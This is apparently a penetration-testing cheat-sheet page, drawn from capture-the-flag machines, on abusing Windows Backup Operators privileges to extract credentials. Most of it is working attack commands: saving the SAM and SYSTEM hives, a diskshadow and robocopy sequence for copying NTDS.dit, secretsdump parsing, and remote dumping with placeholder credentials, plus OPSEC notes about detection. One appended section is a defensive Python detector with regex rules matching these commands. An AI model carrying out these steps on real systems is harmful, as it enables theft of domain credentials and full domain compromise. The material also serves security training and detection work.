
Backup Operators Abuse

#Overview

The Backup Operators group has two powerful privileges: SeBackupPrivilege (read any file regardless of ACL) and SeRestorePrivilege (write any file regardless of ACL). These privileges allow reading the SAM/SYSTEM registry hives and the NTDS.dit Active Directory database — effectively granting credential extraction equivalent to domain admin.

#Prerequisites

  • Membership in the Backup Operators group (or possession of SeBackupPrivilege/SeRestorePrivilege)
  • Ability to execute commands on the target

#Detection & Enumeration

```powershell
# Check current user's group memberships
whoami /groups

# Check for Backup Operators group membership
net group "Backup Operators" /domain

# Check for the specific privileges. The State column shows whether each one is
# currently Enabled; a privilege listed as Disabled is still held, and reg save
# enables it itself when it needs it.
whoami /priv | findstr /i "SeBackupPrivilege SeRestorePrivilege"

# Note: a plain read of a protected file (type / Get-Content) does not exercise
# SeBackupPrivilege, because an ordinary open does not request backup semantics
# and the SAM hive is held open by the system, so it fails even when the
# privilege is present. Whether "reg save hklm\sam" succeeds is the working test.
```

#Exploitation / Execution

#Reading SAM & SYSTEM with SeBackupPrivilege

```cmd
:: Method 1: reg save (RegSaveKey relies on SeBackupPrivilege; reg.exe enables the
:: privilege itself, it only needs to be present in the token - see whoami /priv)
reg save hklm\sam C:\temp\sam.bak
reg save hklm\system C:\temp\system.bak

:: Transfer to attacker and parse offline (the Kali package installs the command as
:: impacket-secretsdump; the upstream script is secretsdump.py)
impacket-secretsdump -sam sam.bak -system system.bak LOCAL
```

#Using diskshadow for NTDS.dit Extraction

```cmd
:: Create a diskshadow script file. Type these at an interactive cmd prompt: there
:: the undefined %vss1% is kept literally, whereas inside a .bat it expands to
:: nothing. diskshadow's "exec" only runs executables, so a cmd built-in such as
:: "copy" cannot be called from the script; expose the shadow as a drive letter
:: and copy from it afterwards instead.
echo set context persistent nowriters > C:\temp\shadow.dsh
echo add volume C: alias vss1 >> C:\temp\shadow.dsh
echo create >> C:\temp\shadow.dsh
echo expose %vss1% z: >> C:\temp\shadow.dsh

:: Execute the diskshadow script
diskshadow /s C:\temp\shadow.dsh

:: Copy NTDS.dit and the SYSTEM hive out of the shadow copy: the shadow is not
:: locked by the NTDS service, and /b (backup mode) bypasses the files' ACLs
robocopy /b z:\Windows\NTDS C:\temp ntds.dit
robocopy /b z:\Windows\System32\config C:\temp SYSTEM

:: Clean up: unexpose and delete the shadow once the copies exist
echo unexpose z: > C:\temp\cleanup.dsh
echo delete shadows all >> C:\temp\cleanup.dsh
echo reset >> C:\temp\cleanup.dsh
diskshadow /s C:\temp\cleanup.dsh

:: Parse NTDS.dit offline
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
```

#Using robocopy with Backup Mode

```cmd
:: /b (backup mode) opens the source with backup semantics, so SeBackupPrivilege
:: bypasses the NTFS ACLs. It does NOT bypass exclusive locks: the live SAM/SYSTEM
:: hives and NTDS.dit still fail with a sharing violation, so for those point it at
:: a volume shadow copy exposed as a drive letter (z: here). Other ACL-protected
:: files that are not held open can be copied straight from their live path.
robocopy /b z:\Windows\System32\config C:\temp\config SAM SYSTEM
robocopy /b z:\Windows\NTDS C:\temp\ntds ntds.dit
```

#Reading Files with PowerShell and Backup Privileges

```powershell
# Ordinary file APIs (Get-Content, [System.IO.File]::ReadAllText) open the file
# without FILE_FLAG_BACKUP_SEMANTICS, so they do NOT make use of SeBackupPrivilege
# and fail with Access Denied on files the caller's ACL does not allow.
# Option A: a helper module that reads via BackupRead (its source is not on this page)
Import-Module .\Invoke-BuildBackupPrivilege.ps1

# Option B: copy the file out with robocopy in backup mode, which does open the
# source with backup semantics, then read the copy (it inherits C:\temp's ACL)
robocopy /b C:\Users\Administrator\Desktop C:\temp flag.txt
$content = [System.IO.File]::ReadAllText("C:\temp\flag.txt")
```

#Remote SAM/SYSTEM Extraction via SMB

```bash
# Remote dump with Backup Operators credentials (the Kali package installs the
# command as impacket-secretsdump; the upstream script is secretsdump.py).
# Caveat: -just-dc-ntlm pulls hashes over DRSUAPI replication, which needs
# replication rights that Backup Operators membership does not grant by itself.
impacket-secretsdump 'domain.local/backupuser:password@10.10.10.10' -just-dc-ntlm

# If Backup Operators can authenticate via WinRM
evil-winrm -i 10.10.10.10 -u backupuser -p 'password'
```

#Common Pitfalls

  • ⚠️ diskshadow requires the Backup Operators group AND the privileges must be enabled in the current token
  • ⚠️ SeBackupPrivilege does not grant write access to files — it only bypasses ACLs for read operations
  • ⚠️ SeRestorePrivilege allows bypassing ACLs for write operations but also allows changing file owner
  • ⚠️ NTDS.dit may be locked by the AD service — use volume shadow copy or diskshadow to get a consistent copy
  • ⚠️ robocopy /b uses both privileges (SeBackupPrivilege to read the source, SeRestorePrivilege to write the destination); it does not bypass exclusive file locks, so locked files such as the live hives and NTDS.dit must be copied from a shadow copy (see the previous pitfall)

#OPSEC Considerations

  • 🛡️ Volume shadow copy creation generates Event ID 98 (VSS) and is visible to administrators
  • 🛡️ Registry save operations (reg save) generate Event ID 4657 when Object Access auditing is enabled
  • 🛡️ NTDS.dit copy attempts will fail if the file is locked by NTDS — always use VSS or diskshadow
  • 🛡️ The Backup Operators SID is present in the user's logon token, so the membership itself is visible to EDR
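As an added example (not code from the original page), the detection side of the commands in the Exploitation section: rules matched against process-creation records and correlated per account. It assumes events carrying the account and the full command line, as extracted from Security 4688 with command-line auditing or Sysmon Event ID 1, flattened to dicts; the sample records are constructed.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Command-line patterns for the extraction methods this page describes. Case-
# insensitive and tolerant of full paths, ".exe" suffixes and quoting.
RULES = {
    # reg save of the SAM/SYSTEM/SECURITY hives (RegSaveKey relies on SeBackupPrivilege)
    "reg_save_hive": re.compile(
        r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b', re.I),
    # diskshadow driven by a script file ("diskshadow /s shadow.dsh")
    "diskshadow_script": re.compile(r'\bdiskshadow(?:\.exe)?"?\s+[/-]s\b', re.I),
    # robocopy in backup mode (/b) aimed at NTDS or the registry hive directory
    "robocopy_backup_mode": re.compile(
        r'\brobocopy(?:\.exe)?"?(?=.*\s/b\b)(?=.*(?:\\ntds\b|system32\\config))', re.I),
}


def classify(command_line: str) -> List[str]:
    """Names of all rules matching one process command line (sorted, may be empty)."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))


def find_backup_abuse(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Group matches per account. One account chaining several techniques
    (diskshadow, then robocopy /b, then reg save) is the strongest signal."""
    per_user: Dict[str, set] = defaultdict(set)
    for ev in events:
        per_user[ev["user"]].update(classify(ev["command_line"]))
    report = []
    for user, techniques in sorted(per_user.items()):
        if not techniques:
            continue
        severity = "high" if len(techniques) > 1 or "reg_save_hive" in techniques else "medium"
        report.append({"user": user, "techniques": sorted(techniques), "severity": severity})
    return report


# Constructed sample records (not real telemetry): account plus full command line.
SAMPLE_EVENTS = [
    {"user": r"CORP\backupuser", "command_line": r"reg  save HKLM\SAM C:\temp\sam.bak"},
    {"user": r"CORP\backupuser", "command_line": r"diskshadow /s C:\temp\shadow.dsh"},
    {"user": r"CORP\backupuser", "command_line": r"robocopy /b z:\Windows\NTDS C:\temp ntds.dit"},
    {"user": r"NT AUTHORITY\SYSTEM", "command_line": r'"C:\Program Files\Backup\agent.exe" --full'},
    {"user": r"CORP\alice", "command_line": r"robocopy C:\Users\alice\Documents D:\bak /MIR"},
]

if __name__ == "__main__":
    for finding in find_backup_abuse(SAMPLE_EVENTS):
        print(finding)
```

Legitimate backup software also uses VSS and backup-mode copies, so the per-account correlation and the target paths (hives, NTDS) carry the signal rather than any single process name.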

#Post-Exploitation Value

Backup Operators membership is equivalent to domain admin for credential extraction purposes. From SAM/SYSTEM you get local hashes, and from NTDS.dit you get all domain hashes. This directly leads to domain compromise.

#Tool References

| Tool | Link |
| --- | --- |
| Impacket secretsdump | https://github.com/fortra/impacket |
| diskshadow | Built-in Windows tool |
| robocopy | Built-in Windows tool |
| vssadmin | Built-in Windows tool |

#Source Machines

  • Blackfield (Medium, AD/Windows)
  • Monteverde (Medium, AD)